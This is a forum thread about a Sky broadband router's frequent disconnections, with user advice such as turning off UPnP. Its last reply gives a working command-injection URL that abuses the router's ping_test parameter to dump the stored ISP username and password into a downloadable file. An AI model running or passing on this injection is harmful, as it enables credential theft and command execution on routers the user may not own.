    Hi Penrhyn

My connection keeps dropping off! I have used wireless, ethernet, cryline, sob city.....I haver to reboot the router 8-9-10 times a day....basic crap.

And I still cannot get a good explanation as to why, I pay for max and am lucky to get 1MB.

I don't know if you've sorted this now - but I just wanted to check - you've turned off the uPnP haven't you? This is one of the main causes of the Sky router disconnecting regularly and is well documented on the skyuser forum. Mine was regularly disconnecting and then freezing - disabled the plug n play option (and wireless, actually, as my network is completely wired), and now works no problem (apart from the usual Sky problems, anyway).

    HTH.

    try this

You can use a URL injection technique to get your sky username and password login details from their router. Just type the following into your browser

    http://192.168.0.1/setup.cgi?todo=ping_test&c4_IPAddr=%26/bin/grep+ppoa_+/tmp/nvram+%3E+/www/netgear.cfg

(where 192.168.0.1 is the browser address- change if yours is different)

Then link to the following address

    http://192.168.0.1/netgear.cfg

and open the resulting file in notepad, this will give you the username and password for login which you can put into any router you like.
